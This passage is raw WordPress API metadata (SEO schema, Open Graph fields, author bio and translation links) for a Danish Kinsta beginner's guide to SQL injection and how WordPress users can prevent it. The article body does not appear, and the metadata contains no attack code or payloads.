hostingl\u00f8sninger\",\"publisher\":{\"@id\":\"https:\/\/kinsta.com\/dk\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/kinsta.com\/dk\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"da-DK\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/kinsta.com\/dk\/#organization\",\"name\":\"Kinsta\",\"url\":\"https:\/\/kinsta.com\/dk\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"da-DK\",\"@id\":\"https:\/\/kinsta.com\/dk\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2023\/12\/kinsta-logo.jpeg\",\"contentUrl\":\"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2023\/12\/kinsta-logo.jpeg\",\"width\":500,\"height\":500,\"caption\":\"Kinsta\"},\"image\":{\"@id\":\"https:\/\/kinsta.com\/dk\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/www.facebook.com\/Kinsta-Danmark-122855885298660\/\",\"https:\/\/x.com\/kinsta_dk\",\"https:\/\/www.instagram.com\/kinstahosting\/\",\"https:\/\/www.linkedin.com\/company\/kinsta\/\",\"https:\/\/www.pinterest.com\/kinstahosting\/\",\"https:\/\/www.youtube.com\/c\/Kinsta\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/kinsta.com\/dk\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036\",\"name\":\"Shaumik Daityari\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"da-DK\",\"@id\":\"https:\/\/kinsta.com\/dk\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g\",\"caption\":\"Shaumik Daityari\"},\"description\":\"Shaumik is a data analyst by day, and a comic book enthusiast by night (or maybe, he's Batman?) Shaumik has been writing tutorials and creating screencasts for over five years. When not working, he's busy automating mundane daily tasks through meticulously written scripts!\",\"url\":\"https:\/\/kinsta.com\/dk\/blog\/author\/shaumikdaityari\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"SQL Injection: En Begyndervejledning til WordPress-brugere","description":"L\u00e6r, hvad en SQL-injection er, hvordan SQL-injection s\u00e5rbarheden kan eksistere i dine webapplikationer (som WordPress-websteder), og hvordan du forhindrer angreb.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/","og_locale":"da_DK","og_type":"article","og_title":"SQL Injection: En Begyndervejledning til WordPress-brugere","og_description":"L\u00e6r, hvad en SQL-injection er, hvordan SQL-injection s\u00e5rbarheden kan eksistere i dine webapplikationer (som WordPress-websteder), og hvordan du forhindrer angreb.","og_url":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/","og_site_name":"Kinsta\u00ae","article_publisher":"https:\/\/www.facebook.com\/Kinsta-Danmark-122855885298660\/","article_published_time":"2020-01-22T01:06:33+00:00","article_modified_time":"2023-08-24T12:46:27+00:00","og_image":[{"width":1460,"height":730,"url":"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2020\/01\/sql-injection.jpg","type":"image\/jpeg"}],"author":"Shaumik Daityari","twitter_card":"summary_large_image","twitter_description":"L\u00e6r, hvad en SQL-injection er, hvordan SQL-injection s\u00e5rbarheden kan eksistere i dine webapplikationer (som WordPress-websteder), og hvordan du forhindrer angreb.","twitter_image":"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2020\/01\/sql-injection.jpg","twitter_creator":"@kinsta_dk","twitter_site":"@kinsta_dk","twitter_misc":{"Skrevet af":"Shaumik Daityari","Estimeret l\u00e6setid":"10 minutter"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#article","isPartOf":{"@id":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/"},"author":{"name":"Shaumik Daityari","@id":"https:\/\/kinsta.com\/dk\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036"},"headline":"SQL Injection: En Begyndervejledning til WordPress-brugere","datePublished":"2020-01-22T01:06:33+00:00","dateModified":"2023-08-24T12:46:27+00:00","mainEntityOfPage":{"@id":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/"},"wordCount":2324,"commentCount":0,"publisher":{"@id":"https:\/\/kinsta.com\/dk\/#organization"},"image":{"@id":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#primaryimage"},"thumbnailUrl":"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2020\/01\/sql-injection.jpg","keywords":["sitesecurity","wordpresshack"],"articleSection":["WordPress Sikkerhed"],"inLanguage":"da-DK","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/","url":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/","name":"SQL Injection: En Begyndervejledning til WordPress-brugere","isPartOf":{"@id":"https:\/\/kinsta.com\/dk\/#website"},"primaryImageOfPage":{"@id":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#primaryimage"},"image":{"@id":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#primaryimage"},"thumbnailUrl":"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2020\/01\/sql-injection.jpg","datePublished":"2020-01-22T01:06:33+00:00","dateModified":"2023-08-24T12:46:27+00:00","description":"L\u00e6r, hvad en SQL-injection er, hvordan SQL-injection s\u00e5rbarheden kan eksistere i dine webapplikationer (som WordPress-websteder), og hvordan du forhindrer angreb.","breadcrumb":{"@id":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#breadcrumb"},"inLanguage":"da-DK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/kinsta.com\/dk\/blog\/sql-injection\/"]}]},{"@type":"ImageObject","inLanguage":"da-DK","@id":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#primaryimage","url":"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2020\/01\/sql-injection.jpg","contentUrl":"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2020\/01\/sql-injection.jpg","width":1460,"height":730,"caption":"SQL Injection: En Begyndervejledning til WordPress-brugere"},{"@type":"BreadcrumbList","@id":"https:\/\/kinsta.com\/dk\/blog\/sql-injection\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/kinsta.com\/dk\/"},{"@type":"ListItem","position":2,"name":"WordPress udvikling","item":"https:\/\/kinsta.com\/dk\/emner\/wordpress-udvikling\/"},{"@type":"ListItem","position":3,"name":"SQL Injection: En Begyndervejledning til WordPress-brugere"}]},{"@type":"WebSite","@id":"https:\/\/kinsta.com\/dk\/#website","url":"https:\/\/kinsta.com\/dk\/","name":"Kinsta\u00ae","description":"Hurtig, sikker, premium hostingl\u00f8sninger","publisher":{"@id":"https:\/\/kinsta.com\/dk\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/kinsta.com\/dk\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"da-DK"},{"@type":"Organization","@id":"https:\/\/kinsta.com\/dk\/#organization","name":"Kinsta","url":"https:\/\/kinsta.com\/dk\/","logo":{"@type":"ImageObject","inLanguage":"da-DK","@id":"https:\/\/kinsta.com\/dk\/#\/schema\/logo\/image\/","url":"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2023\/12\/kinsta-logo.jpeg","contentUrl":"https:\/\/kinsta.com\/dk\/wp-content\/uploads\/sites\/12\/2023\/12\/kinsta-logo.jpeg","width":500,"height":500,"caption":"Kinsta"},"image":{"@id":"https:\/\/kinsta.com\/dk\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/Kinsta-Danmark-122855885298660\/","https:\/\/x.com\/kinsta_dk","https:\/\/www.instagram.com\/kinstahosting\/","https:\/\/www.linkedin.com\/company\/kinsta\/","https:\/\/www.pinterest.com\/kinstahosting\/","https:\/\/www.youtube.com\/c\/Kinsta"]},{"@type":"Person","@id":"https:\/\/kinsta.com\/dk\/#\/schema\/person\/9d2eef02950231307b3e89cc7c932036","name":"Shaumik Daityari","image":{"@type":"ImageObject","inLanguage":"da-DK","@id":"https:\/\/kinsta.com\/dk\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/feb5b18a7ac559ec6c8e8afcf96418ac?s=96&d=mm&r=g","caption":"Shaumik Daityari"},"description":"Shaumik is a data analyst by day, and a comic book enthusiast by night (or maybe, he's Batman?) Shaumik has been writing tutorials and creating screencasts for over five years. When not working, he's busy automating mundane daily tasks through meticulously written scripts!","url":"https:\/\/kinsta.com\/dk\/blog\/author\/shaumikdaityari\/"}]}},"acf":[],"_links":{"self":[{"href":"https:\/\/kinsta.com\/dk\/wp-json\/wp\/v2\/posts\/35684","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kinsta.com\/dk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kinsta.com\/dk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kinsta.com\/dk\/wp-json\/wp\/v2\/users\/118"}],"replies":[{"embeddable":true,"href":"https:\/\/kinsta.com\/dk\/wp-json\/wp\/v2\/comments?post=35684"}],"version-history":[{"count":4,"href":"https:\/\/kinsta.com\/dk\/wp-json\/wp\/v2\/posts\/35684\/revisions"}],"predecessor-version":[{"id":44409,"href":"https:\/\/kinsta.com\/dk\/wp-json\/wp\/v2\/posts\/35684\/revisions\/44409"}],"alternate":[{"embeddable":true,"hreflang":"en","title":"English","href":"https:\/\/kinsta.com\/dk\/wp-json\/kinsta\/v1\/posts\/35684\/translations\/en"},{"embeddable":true,"hreflang":"fr","title":"French","href":"https:\/\/kinsta.com\/dk\/wp-json\/kinsta\/v1\/posts\/35684\/translations\/fr"},{"embeddable":true,"hreflang":"es","title":"Spanish","href":"https:\/\/kinsta.com\/dk\/wp-json\/kinsta\/v1\/posts\/35684\/translations\/es"},{"embeddable":true,"hreflang":"pt","title":"Portuguese","href":"https:\/\/kinsta.com\/dk\/wp-json\/kinsta\/v1\/posts\/35684\/translations\/pt"},{"embeddable":true,"hreflang":"it","title":"Italian","href":"https:\/\/kinsta.com\/dk\/wp-json\/kinsta\/v1\/posts\/35684\/translations\/it"},{"embeddable":true,"hreflang":"da","title":"Danish","href":"https:\/\/kinsta.com\/dk\/wp-json\/kinsta\/v1\/posts\/35684\/translations\/dk"},{"embeddable":true,"hreflang":"nl","title":"Dutch","href":"https:\/\/kinsta.com\/dk\/wp-json\/kinsta\/v1\/posts\/35684\/translations\/nl"},{"embeddable":true,"hreflang":"de","title":"German","href":"https:\/\/kinsta.com\/dk\/wp-json\/kinsta\/v1\/posts\/35684\/translations\/de"},{"embeddable":true,"hreflang":"sv","title":"Swedish","href":"https:\/\/kinsta.com\/dk\/wp-json\/kinsta\/v1\/posts\/35684\/translations\/se"},{"href":"https:\/\/kinsta.com\/dk\/wp-json\/kinsta\/v1\/posts\/35684\/tree"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kinsta.com\/dk\/wp-json\/wp\/v2\/media\/35687"}],"wp:attachment":[{"href":"https:\/\/kinsta.com\/dk\/wp-json\/wp\/v2\/media?parent=35684"}],"wp:term":[{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kinsta.com\/dk\/wp-json\/wp\/v2\/tags?post=35684"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/kinsta.com\/dk\/wp-json\/wp\/v2\/topic?post=35684"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}